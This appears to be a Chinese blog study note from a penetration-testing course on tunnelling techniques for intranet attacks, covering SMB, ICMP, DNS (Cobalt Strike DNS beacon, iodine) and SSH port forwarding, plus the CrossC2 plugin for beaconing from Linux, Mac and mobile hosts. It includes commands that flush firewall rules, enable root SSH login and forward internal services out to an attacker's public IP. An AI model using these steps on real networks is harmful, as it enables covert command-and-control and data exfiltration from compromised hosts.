内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac 简单总结

第126天:内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac_内网安全-隧道技术_ssh_dns_icmp_smb_上线通讯linux_mac-CSDN博客

内网渗透---隧道技术_隧道技术csdn-CSDN博客

#SMB 隧道&通讯&上线

判断:445 通讯

上线:借助通讯后绑定上线

通讯:直接 SMB 协议通讯即可

上一篇文章有讲解

#ICMP 隧道&通讯&上线

判断:ping 命令

上线:见前面课程

通讯:其他项目(icmpsh icmptunnel)

https://github.com/esrrhs/spp

https://github.com/bdamele/icmpsh

https://github.com/esrrhs/pingtunnel

#DNS 隧道&通讯&上线

在进行DNS查询时,如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。如果在互联网上有一台定制的服务器,那么依靠DNS协议即可进行数据包的交换。

判断:nslookup dig

DNS上线

1、上线环境:内网主机只出网 DNS 协议数据,解决上线

-域名申请及配置

准备一个域名并配置两条NS解析,NS解析将子域名指定其它DNS解析

-监听器创建及配置

http协议无法上线

配置监听器

设置监听器,Payload选择Beacon DNSDNS地址选择刚刚填写的ns1记录ns2记录,下面的DNS地址( Stager)填写A记录,也就是CS.xxx.fun

-后门绑定监听器及生成

在受害者主机执行后门,上线,然后执行命令mode dns -txt

DNS隧道解决通讯问题

2、通讯环境:

内网主机只出网 DNS 协议数据,解决通讯

https://github.com/yarrick/iodine

iodine工作原理是 ,通过TAP虚拟网卡,在服务端建立起一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网。在客户端和服务端之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡。

判断出网:nslookup www.baidu.com

将工具运行起来,运行起来后,你可以输入命令去查看一下网卡,会发现多出一个网卡,这里的选择的网段,千万不要和现有的网段冲突

-服务器:设置密码 xiaodi 并创建虚拟 IP 及绑定域名指向

iodined -f -c -P xiaodi 192.168.0.1 ns1.xiaodi8.com -DD

设置密码 xiaodi 并创建虚拟 IP 及绑定域名指向

-f:在前台运行

-c:禁止检查所有传入请求的客户端IP地址。

-P:客户端和服务端之间用于验证身份的密码。

-D:指定调试级别,-DD指第二级。"D"的数量随级别增加。

-客户端:连接密码 xiaodi 并绑定域名指向

iodine -f -M 200 -P xiaodi ns1.xiaodi8.com

windows不建议用

客户端的工具其实可以直接去官网中下载已经编译好的,但是有一个问题就是无法直接使用,会出现报错,需要安装一个APT网卡

安装软件不现实

客户端的工具运行起来还需要管理员操作,都管理员了,我还要你个DNS隧道干嘛...同样这里,操作完输入命令后,可以看到多出了一个IP地址,刚刚设置的是192.168.0.1网段的IP,那么这里自动就会生成一个192.168.0.2的IP地址。

客户端建立192.168.0.2的虚拟网卡

测试链接

-尝试通讯尝试连接:

ssh root@192.168.0.2 xiaodi

#SSH 隧道&通讯

前提:跳板机为linux,获得root权限,

最好跳板机上不要有过多的防火墙策略,也就是Linux内置的防火墙策略,关策略需要使用root权限。

判断:ssh连接

1、上线:

由于CS无SSH协议监听器配置,无法上线。上线linux需要使用插件

内网渗透---Linux上线_cs上线linux-CSDN博客

2、通讯:

由于SSH协议存在于Linux系统,跳板机必须Linux

iptables -F /* 清除所有规则 */

iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/

iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/

iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口,一般不开 */

iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */

iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/

iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT

iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/

iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT

iptables-save > /etc/sysconfig/iptables /*保存配置*/

iptables -L /* 显示iptables列表 */

开启ssh协议登录:

vi /etc/ssh/sshd_config

PermitRootLogin yes

PasswordAuthentication yes

/etc/init.d/ssh start

/etc/init.d/ssh restart

ssh参数

-C:压缩传输,提高传输速度

-f:将SSH传输转入后台执行,不占用当前的Shell

-N:建立静默连接(建立了连接,但是看不到具体会话)

-g:允许远程主机连接本地用于转发的端口

-L:本地端口转发

-R:远程端口转发

-D:动态转发(SOCKS代理)

-P:指定SSH端口

本地:出站封,走正向

bash 复制代码
ssh -CfNg -L 1122:192.168.1.15:8080 root@192.168.1.166
curl http://127.0.0.1:1122

将本地访问1.168080端口流量转发至本地的1122端口

结果:访问192.168.1.166本地1122端口,探测到1.16:8080

ssh远程转发:入站封,走反向

bash 复制代码
ssh -CfNg -R 1234:192.168.1.15:8080 root@47.94.236.117
curl http://127.0.0.1:1234

将跳板机上访问的IP地址及端口流量转发至攻击机上的某个端口,

将本地的访问1.168080端口流量转发至47.94.236.117的1234 端口

结果:探测到内网数据

攻击者访问自己本地的1234即可访问windows的8080端口

#控制上线-插件-Linux&Mac&IOS&Android

内网渗透---Linux上线_cs上线linux-CSDN博客

https://github.com/gloxec/CrossC2

面向Linux Mac IOS Android系统上线支持

1、插件使用

2、命令使用

使用参考:

https://gloxec.github.io/CrossC2/zh_cn/

目前版本只支持反向的https和正向的tcp

1、下载对应版本加载器和CNA插件

2、上传加载器文件和本地加载CNA插件

3、修改CNA插件配置路径及上传Key文件

4、使用命令或插件绑定HTTPS监听器生成

相关推荐
ZHOUPUYU28 分钟前
Centos常用命令,按功能分类,用户和权限管理等
linux·运维·centos
赛德乌漆麻黑哟39 分钟前
FOFA--网络空间资产搜索引擎(常用语法以及拓展)
网络·安全·搜索引擎
vvw&1 小时前
如何在 Ubuntu 22.04 上安装 phpMyAdmin
linux·运维·服务器·mysql·ubuntu·php·phpmyadmin
Hacker_Oldv1 小时前
iptables网络安全服务详细使用
网络·安全·web安全
xcLeigh1 小时前
网络安全 | 云计算中的数据加密与访问控制
安全·web安全·云计算
灰勒塔德2 小时前
Linux文件IO
linux·运维·服务器
花姐夫Jun3 小时前
在 CentOS 8 系统上安装 Jenkins 的全过程
linux·centos·jenkins
不惑_3 小时前
List 集合安全操作指南:避免 ConcurrentModificationException 与提升性能
数据结构·安全·list
是店小二呀3 小时前
【Linux】Linux开发利器:make与Makefile自动化构建详解
linux·运维·自动化
BUG 4044 小时前
LINUX--shell
linux·运维·服务器